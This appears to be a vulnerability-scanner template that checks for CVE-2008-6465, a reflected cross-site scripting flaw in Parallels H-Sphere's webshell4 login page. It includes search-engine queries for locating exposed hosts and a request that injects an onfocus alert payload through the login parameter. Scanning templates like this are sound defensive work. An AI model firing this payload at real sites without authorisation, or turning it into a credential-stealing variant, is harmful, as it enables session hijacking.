id: CVE-2008-6465 info: name: Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting author: edoardottt severity: medium description: | Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability. reference: - http://www.xssing.com/index.php?x=3&y=65 - https://exchange.xforce.ibmcloud.com/vulnerabilities/45254 - https://exchange.xforce.ibmcloud.com/vulnerabilities/45252 - https://nvd.nist.gov/vuln/detail/CVE-2008-6465 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2008-6465 cwe-id: CWE-79 epss-score: 0.00421 epss-percentile: 0.73765 cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: parallels product: h-sphere shodan-query: - title:"Parallels H-Sphere - http.title:"h-sphere" - http.title:"parallels h-sphere" fofa-query: - title="h-sphere" - title="parallels h-sphere" google-query: - intitle:"h-sphere" - intitle:"parallels h-sphere" tags: cve,cve2008,xss,parallels,h-sphere http: - method: GET path: - '{{BaseURL}}/webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U' matchers-condition: and matchers: - type: word part: body words: - '\" onfocus=alert(document.domain); autofocus' - 'Please enter login name & password' condition: and - type: word part: header words: - 'text/html' - type: status status: - 200 # digest: 490a0046304402202f5d9bbda9c856d7eac18bbe866eb3249138a90a0b6b072b3cb11cd24f4afb7102201d8c97f30783c811f77802a6f6e66471e8bc85afe7df1a619f756c7437dba8e1:922c64590222798bb761d5b6d8e72950